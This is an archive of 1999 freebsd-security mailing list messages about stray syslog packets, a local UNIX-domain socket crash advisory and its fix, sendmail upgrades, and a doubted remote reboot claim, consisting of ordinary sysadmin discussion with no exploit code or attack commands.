Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This afternoon I logged some unusual packets from cp-pm4.glas.apc.org coming into the syslog port on two of hosts (one BSD/OS, the other FreeBSD). Since I am not in the habit of accepting [syslog] packets from strangers, I tcpdum'd them. I've attached syslogd getting upset, a copy of two packets in hex form, and the useful text from the packet below that. I don't know if this is a port scan, or what it is, but sending ports to other people's hosts using syslog is not very polite. Any takers on what this is exactly? May 7 17:39:03 fledge syslogd: discarded 1 unwanted packets in secure mode May 7 17:39:20 fledge syslogd: discarded 2 unwanted packets in secure mode May 7 17:40:10 fledge syslogd: discarded 4 unwanted packets in secure mode May 7 17:43:37 fledge syslogd: discarded 8 unwanted packets in secure mode 17:40:21.740443 cp-pm4.glas.apc.org.1023 > www.modarchive.com.syslog: udp 96 4500 007c 1aae 0000 f411 1128 c17c 05c1 cf56 0407 03ff 0202 0068 752f 3c31 343e 4368 6f69 6365 4e65 7420 426c 6f63 6b20 3139 352e 3231 382e 3235 312e 3520 2d20 3030 2035 3020 3034 2037 6120 3566 2062 6420 6435 2030 6120 3030 2030 6620 6537 2035 6320 3530 2031 3120 3232 2033 3820 6461 2035 6620 3030 2030 3020 17:40:10.980831 cp-pm4.glas.apc.org.1023 > fledge.watson.org.syslog: udp 108 4500 0088 1a37 0000 ee11 1222 c17c 05c1 cc9c 0c32 03ff 0202 0074 1f36 3c31 343e 4368 6f69 6365 4e65 7420 426c 6f63 6b20 3139 352e 3231 382e 3235 312e 3520 2d20 3030 2035 3020 3034 2037 3820 3330 2038 6320 3865 2031 6320 3030 2030 6620 6362 2037 6520 3630 2031 3220 3434 2037 3020 3263 2066 3920 3030 2030 3020 3032 2030 3420 3035 2062 3420 Useful text extracted: (some headers) followed by <14>ChoiceNet Block 195.218.25 1.5 - 00 50 04 7b 30 c6 12 78 00 10 0c ed 60 12 44 70 66 f1 00 00 02 04 05 b4 Unfortunately, I don't have an IP for the host in question, as I didn't log that (that is just stdout from tcpdump, because the packets stopped shortly afterwards). Also, this morning, I observed a coredump of named on another of my hosts. Both of these hosts are running 2.2-stable at the end of the 2.2 branch lifetime. I'm a little concerned. Are there any known issues with the version of named last shipped with 2.2-stable (4.9.7-T1B)? Anyone know what these syslog packets might mean? (the content is a little weird). May 7 08:42:37 cyrus /kernel: pid 106 (named), uid 0: exited on signal 11 Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ Safeport Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 7 17:21:48 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id C87D714EAE for ; Fri, 7 May 1999 17:21:40 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id RAA28401; Fri, 7 May 1999 17:21:30 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id RAA11146; Fri, 7 May 1999 17:21:29 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id RAA16889; Fri, 7 May 1999 17:21:24 -0700 (PDT) From: Don Lewis Message-Id: <199905080021.RAA16889@salsa.gv.tsc.tdk.com> Date: Fri, 7 May 1999 17:21:24 -0700 In-Reply-To: Kevin Day "Re: KKIS.05051999.003b" (May 6, 2:10pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Kevin Day , BUGTRAQ@netspace.org Subject: Re: KKIS.05051999.003b Cc: security@freebsd.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On May 6, 2:10pm, Kevin Day wrote: } Subject: Re: KKIS.05051999.003b } > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ } > Report title : Security problem with sockets in FreeBSD's } > implementation of UNIX-domain protocol family. } > Problem found by : Lukasz Luzar (lluzar@security.kki.pl) } > Report created by : Robert Pajak (shadow@security.kki.pl) } > Lukasz Luzar (lluzar@security.kki.pl) } > Raport published : 5th May 1999 } > Raport code : KKIS.05051999.003.b } > Systems affected : FreeBSD-3.0 and maybe 3.1, } > Archive : http://www.security.kki.pl/advisories/ } > Risk level : high } > } > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ } > As you know, "The UNIX-domain protocol family is a collection of protocols } > that provides local interprocess communication through the normal socket } > mechanism. It supports the SOCK_STREAM and SOCK_DGRAM soceket types and uses } > filesystem pathnames for addressing." } > The SOCK_STREAM sockets also supports the communication of UNIX file } > descriptors through the use of functions sendmsg() and recvmsg(). } > While testing UNIX-domain protocols, we have found probable bug in } > FreeBSD's implementation of this mechanism. } > When we had run attached example on FreeBSD-3.0 as local user, system } > had crashed imediatelly with error "Supervisor read, page not present" } > in kernel mode. } > } } Here's my testing so far: } } 2.2.2 - Vulnerable } 2.2.6 - Vulnerable } 2.2.8 - Vulnerable } 3.1-RELEASE - Ran 15 minutes, no crash. I'd be willing to bet that 3.0-RELEASE is also vulnerable. I believe Matt Dillon fixed this earlier this year in revisions 1.38/1.39 (-CURRENT branch January 21, 1999) and 1.37.2.1 (RELENG_3 branch February 15, 1999) of sys/kern/uipc-usrreq.c. The RELENG_3 branch fix was committed just before 3.1-RELEASE. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 7 17:25:18 1999 Delivered-To: freebsd-security@freebsd.org Received: from bamboo.verinet.com (bamboo.verinet.com [204.144.246.5]) by hub.freebsd.org (Postfix) with ESMTP id 506A314EA7; Fri, 7 May 1999 17:25:13 -0700 (PDT) (envelope-from allenc@verinet.com) Received: from const. (allenc.verinet.com [199.45.180.181]) by bamboo.verinet.com (8.8.7/8.7.1) with ESMTP id SAA24945; Fri, 7 May 1999 18:24:52 -0600 Received: from verinet.com (IDENT:allenc@pragma. [192.168.1.2]) by const. (8.9.2/8.9.2) with ESMTP id AAA27801; Sat, 8 May 1999 00:27:49 GMT (envelope-from allenc@verinet.com) Message-ID: <3733846C.1CA166E@verinet.com> Date: Fri, 07 May 1999 18:25:16 -0600 From: Allen Campbell X-Mailer: Mozilla 4.51 [en] (X11; I; Linux 2.2.5 i686) X-Accept-Language: en MIME-Version: 1.0 To: Brett Glass Cc: chris@calldei.com, Will Mitayai Keeso Rowe , stable@FreeBSD.ORG, security@FreeBSD.ORG, Matt Scollard Subject: Re: Sendmail 8.8.8 probs. References: <02fd01be98c9$9fc3a480$efd992d1@p09.aecinfo.com> <02fd01be98c9$9fc3a480$efd992d1@p09.aecinfo.com> <4.2.0.37.19990507154839.044cff00@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brett Glass wrote: > > 2.2.8 is less than half a year old. It ought to be supported. > > --Brett > > At 04:07 PM 5/7/99 -0500, Chris Costello wrote: > >On Fri, May 7, 1999, Will Mitayai Keeso Rowe wrote: > > > According to sendmail.org, there are a number of security problems with sendmail 8.8.8. Are there > > > any plans to update 2.2-STABLE's sendmail? > > > > You can always download Sendmail 8.9.3 from sendmail.org, or > >if you're feeling lucky, migrate to 3.1-STABLE (or wait for 3.2) > > > > > > > > > > > --- > > > Will Mitayai Keeso Rowe > > > Director of Internet Technology > > > AEC InfoCenter, Inc > > > Suite 200, 25 Imperial Street / Toronto, Ontario / M5P 1B9 / Canada > > > Phone: +1(416)489-9000 Fax: +1(416)489-3201 > > > Email: mitayai@aecinfo.com Web: http://www.aecinfo.com > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-stable" in the body of the message > > > > > > >-- > >Chris Costello > >Don't stop at one bug. > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-stable" in the body of the message You forgot the patches. -- Allen Campbell | Lurking at the bottom of the allenc@verinet.com | gravity well, getting old. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 7 17:34:30 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp2.263.net (unknown [202.96.44.20]) by hub.freebsd.org (Postfix) with SMTP id 2347714C8D for ; Fri, 7 May 1999 17:34:21 -0700 (PDT) (envelope-from zylin@263.net) Received: (fmail 19087 invoked from network); 8 May 1999 00:37:18 -0000 Received: from unknown (HELO 263.net) (202.96.44.26) by smtp2 with SMTP; 8 May 1999 00:37:18 -0000 Received: (fmail 18207 invoked by uid 1004); 8 May 1999 00:33:37 -0000 Date: 8 May 1999 00:33:37 -0000 Message-ID: <19990508003337.18206.fmail@263.net> Reply-To: zylin@263.net From: zylin@263.net To: freebsd-security@freebsd.org Subject: max files a process can open Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I don't know how to change the number of max files a process can open. Who can help me? Thanx. __________________________________________________ »¶Ó­Ê¹ÓÃÊ׶¼ÔÚÏßÃâ·Ñµç×ÓÓÊÏähttp://freemail.263.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 7 21:15:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 0DD22153EE for ; Fri, 7 May 1999 21:15:28 -0700 (PDT) (envelope-from mike@sentex.net) Received: from ospf-wat.sentex.net (ospf-wat.sentex.net [209.167.248.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id AAA04967; Sat, 8 May 1999 00:14:17 -0400 (EDT) From: mike@sentex.net (Mike Tancsa) To: zylin@263.net Cc: freebsd-security@freebsd.org Subject: Re: max files a process can open Date: Sun, 09 May 1999 04:23:55 GMT Message-ID: <37350d9c.992206@mail.sentex.net> References: In-Reply-To: X-Mailer: Forte Agent .99e/32.227 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 7 May 1999 20:34:45 -0400, in sentex.lists.freebsd.misc you wrote: >Hi, I don't know how to change the number of max files >a process can open. Who can help me? This is a question more for questions@freebsd.org, not the security list. Have a look at /etc/login.conf for details on how to do what you want to do. ---Mike Mike Tancsa (mdtancsa@sentex.net) Sentex Communications Corp, Waterloo, Ontario, Canada To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 7 21:27:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id CA91B15616 for ; Fri, 7 May 1999 21:27:48 -0700 (PDT) (envelope-from mike@sentex.net) Received: from ospf-wat.sentex.net (ospf-wat.sentex.net [209.167.248.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id AAA04785; Sat, 8 May 1999 00:12:09 -0400 (EDT) From: mike@sentex.net (Mike Tancsa) To: robert@cyrus.watson.org (Robert Watson) Cc: security@freebsd.org Subject: Re: Unusual syslog packets, crashing named... Date: Sun, 09 May 1999 04:21:48 GMT Message-ID: <37350c62.678976@mail.sentex.net> References: In-Reply-To: X-Mailer: Forte Agent .99e/32.227 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 7 May 1999 20:00:34 -0400, in sentex.lists.freebsd.misc you wrote: >This afternoon I logged some unusual packets from cp-pm4.glas.apc.org >coming into the syslog port on two of hosts (one BSD/OS, the other >FreeBSD). Since I am not in the habit of accepting [syslog] packets from >strangers, I tcpdum'd them. I've attached syslogd getting upset, a copy >of two packets in hex form, and the useful text from the packet below >that. I don't know if this is a port scan, or what it is, but sending >ports to other people's hosts using syslog is not very polite. Any takers >on what this is exactly? > >May 7 17:39:03 fledge syslogd: discarded 1 unwanted packets in secure >mode >May 7 17:39:20 fledge syslogd: discarded 2 unwanted packets in secure >mode >May 7 17:40:10 fledge syslogd: discarded 4 unwanted packets in secure >mode >May 7 17:43:37 fledge syslogd: discarded 8 unwanted packets in secure >mode > > >17:40:21.740443 cp-pm4.glas.apc.org.1023 > www.modarchive.com.syslog: udp >17:40:10.980831 cp-pm4.glas.apc.org.1023 > fledge.watson.org.syslog: udp >Useful text extracted: >(some headers) followed by ><14>ChoiceNet Block 195.218.25 >1.5 - 00 50 04 7b 30 c6 12 78 00 10 0c ed 60 12 44 70 66 f1 00 00 02 04 05 >b4 The text and the host name seem to indicate a Livingston/Lucent Portmaster 4 terminal server. ChoiceNet is their 'filtering' software. On the PMs you can configure the box to send out via syslog any filter violations. e.g. if the dialup user is set so that they are only allowed outgoing access to port 110 (POP3), but try to browse, the filter will block them, and send the message to syslog. My guess is that the person made a typo in setting his/her loghost. Are you sure its crashing named though ? or is it just a coincidence... ---Mike Mike Tancsa (mdtancsa@sentex.net) Sentex Communications Corp, Waterloo, Ontario, Canada To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 7 22:35:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (unknown [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 95E4D153EF for ; Fri, 7 May 1999 22:35:11 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com (homer.softweyr.com [204.68.178.39]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id XAA14390; Fri, 7 May 1999 23:34:59 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <3733CD02.4A9BE15@softweyr.com> Date: Fri, 07 May 1999 23:34:58 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Don Lewis Cc: Kevin Day , security@FreeBSD.ORG Subject: Re: KKIS.05051999.003b References: <199905080021.RAA16889@salsa.gv.tsc.tdk.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Don Lewis wrote: > > On May 6, 2:10pm, Kevin Day wrote: > } > } Here's my testing so far: > } > } 2.2.2 - Vulnerable > } 2.2.6 - Vulnerable > } 2.2.8 - Vulnerable > } 3.1-RELEASE - Ran 15 minutes, no crash. Let it keep running. It will (apparently) eventually exhaust all available file handles in an unrecoverable manner. 3.1-R is better, but not invulnerable. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 7 22:57:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (unknown [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id C050214EC2; Fri, 7 May 1999 22:57:50 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com (homer.softweyr.com [204.68.178.39]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id XAA14440; Fri, 7 May 1999 23:57:47 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <3733D259.9224A03@softweyr.com> Date: Fri, 07 May 1999 23:57:45 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Brett Glass Cc: stable@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: Sendmail 8.8.8 probs. References: <02fd01be98c9$9fc3a480$efd992d1@p09.aecinfo.com> <02fd01be98c9$9fc3a480$efd992d1@p09.aecinfo.com> <4.2.0.37.19990507154839.044cff00@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brett Glass wrote: > > 2.2.8 is less than half a year old. It ought to be supported. > So build a sendmail 8.9.3 package for 2.2.8 and put it on an FTP server somewhere. Geez, this discussion seems familiar. I got that deja vu feeling all over again. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 8 7:11: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id B5E5D152DE; Sat, 8 May 1999 07:10:56 -0700 (PDT) (envelope-from cy@cschuber.net.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id HAA15076; Sat, 8 May 1999 07:11:29 -0700 Received: from cschuber.net.gov.bc.ca(142.31.240.113), claiming to be "cwsys.cwsent.com" via SMTP by point.osg.gov.bc.ca, id smtpda15072; Sat May 8 07:11:25 1999 Received: (from uucp@localhost) by cwsys.cwsent.com (8.9.3/8.9.1) id HAA39550; Sat, 8 May 1999 07:10:26 -0700 (PDT) Message-Id: <199905081410.HAA39550@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdt39546; Sat May 8 07:10:16 1999 X-Mailer: exmh version 2.0.2 2/24/98 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 2.2.8-RELEASE X-Sender: cy To: chris@calldei.com Cc: "Jordan K. Hubbard" , Mike Smith , Seth , freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG, jamie@exodus.net Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) In-reply-to: Your message of "Mon, 03 May 1999 22:51:32 CDT." <19990503225131.I10291@holly.dyndns.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sat, 08 May 1999 07:10:15 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <19990503225131.I10291@holly.dyndns.org>, Chris Costello writes: > On Mon, May 3, 1999, Jordan K. Hubbard wrote: > > > I have to say that Jamie really let us down by not running a raw > > > tcpdump alongside the second targetted machine here. Any chance of > > > provoking these people into "demonstrating" the exploit on a machine, > > > while another connected to the same wire is running > > > > I'd say he or whomever first reported this to bugtraq let us down even > > more by releasing an "advisory" in such an unknown and unverifyable > > state. By doing so, all they've done is hand ammunition to the FUD > > corps and given us no reasonable chance to respond since the advisory > > I get the impression that that was the whole point of the > bugtraq post, to give us more grief. How do we know that it's even true? For all we know it could just be lie to stir the pot. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Open Systems Group Internet: Cy.Schubert@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Province of BC "e**(i*pi)+1=0" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 8 7:26:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 08577152DE; Sat, 8 May 1999 07:26:39 -0700 (PDT) (envelope-from cy@cschuber.net.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id HAA15136; Sat, 8 May 1999 07:27:29 -0700 Received: from cschuber.net.gov.bc.ca(142.31.240.113), claiming to be "cwsys.cwsent.com" via SMTP by point.osg.gov.bc.ca, id smtpda15134; Sat May 8 07:27:13 1999 Received: (from uucp@localhost) by cwsys.cwsent.com (8.9.3/8.9.1) id HAA39682; Sat, 8 May 1999 07:26:17 -0700 (PDT) Message-Id: <199905081426.HAA39682@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdj39678; Sat May 8 07:26:11 1999 X-Mailer: exmh version 2.0.2 2/24/98 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 2.2.8-RELEASE X-Sender: cy To: Cy Schubert - ITSD Open Systems Group Cc: chris@calldei.com, "Jordan K. Hubbard" , Mike Smith , Seth , freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG, jamie@exodus.net Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) In-reply-to: Your message of "Sat, 08 May 1999 07:10:15 PDT." <199905081410.HAA39550@cwsys.cwsent.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sat, 08 May 1999 07:26:10 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It looks like I spoke too soon again. I need to read the last comment in a thread before commenting on one in the middle. My apologies to all. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Open Systems Group Internet: Cy.Schubert@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Province of BC "e**(i*pi)+1=0" In message <199905081410.HAA39550@cwsys.cwsent.com>, Cy Schubert - ITSD Open Sy stems Group writes: > In message <19990503225131.I10291@holly.dyndns.org>, Chris Costello > writes: > > On Mon, May 3, 1999, Jordan K. Hubbard wrote: > > > > I have to say that Jamie really let us down by not running a raw > > > > tcpdump alongside the second targetted machine here. Any chance of > > > > provoking these people into "demonstrating" the exploit on a machine, > > > > while another connected to the same wire is running > > > > > > I'd say he or whomever first reported this to bugtraq let us down even > > > more by releasing an "advisory" in such an unknown and unverifyable > > > state. By doing so, all they've done is hand ammunition to the FUD > > > corps and given us no reasonable chance to respond since the advisory > > > > I get the impression that that was the whole point of the > > bugtraq post, to give us more grief. > > How do we know that it's even true? For all we know it could just be > lie to stir the pot. > > > Regards, Phone: (250)387-8437 > Cy Schubert Fax: (250)387-5766 > Open Systems Group Internet: Cy.Schubert@uumail.gov.bc.ca > ITSD Cy.Schubert@gems8.gov.bc.ca > Province of BC > "e**(i*pi)+1=0" > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-stable" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 8 8:17:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 9DAEE14CC4 for ; Sat, 8 May 1999 08:17:40 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id LAA01455; Sat, 8 May 1999 11:17:37 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Sat, 8 May 1999 11:17:37 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Mike Tancsa Cc: security@freebsd.org Subject: Re: Unusual syslog packets, crashing named... In-Reply-To: <37350c62.678976@mail.sentex.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 9 May 1999, Mike Tancsa wrote: > The text and the host name seem to indicate a Livingston/Lucent Portmaster > 4 terminal server. ChoiceNet is their 'filtering' software. On the PMs > you can configure the box to send out via syslog any filter violations. > e.g. if the dialup user is set so that they are only allowed outgoing > access to port 110 (POP3), but try to browse, the filter will block them, > and send the message to syslog. My guess is that the person made a typo in > setting his/her loghost. Weird that it got sent to two of our hosts and not more (we have a whole subnet of virtual domains there..) I've sent them email to see if that helps. > Are you sure its crashing named though ? or is it just a coincidence... Almost certainly a coincidence, but I was concerned that it happened on the same day. Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ Safeport Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 8 12:46:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id C60AD14C3D for ; Sat, 8 May 1999 12:46:44 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id VAA16598; Sat, 8 May 1999 21:46:36 +0200 (CEST) (envelope-from des) To: James Snow Cc: Wojtek , freebsd-security@FreeBSD.ORG Subject: Re: KKIS.05051999.003b (fwd) References: From: Dag-Erling Smorgrav Date: 08 May 1999 21:46:35 +0200 In-Reply-To: James Snow's message of "Thu, 6 May 1999 17:16:38 -0400 (EDT)" Message-ID: Lines: 15 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org James Snow writes: > Other than causing the following problem: > > ls: .: Too many open files in system > > it doesn't appear to be doing anything to me. > > So, 3.1 is in the clear, it seems. For very small values of 'clear'. I consider the inability to open files a major handicap. DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message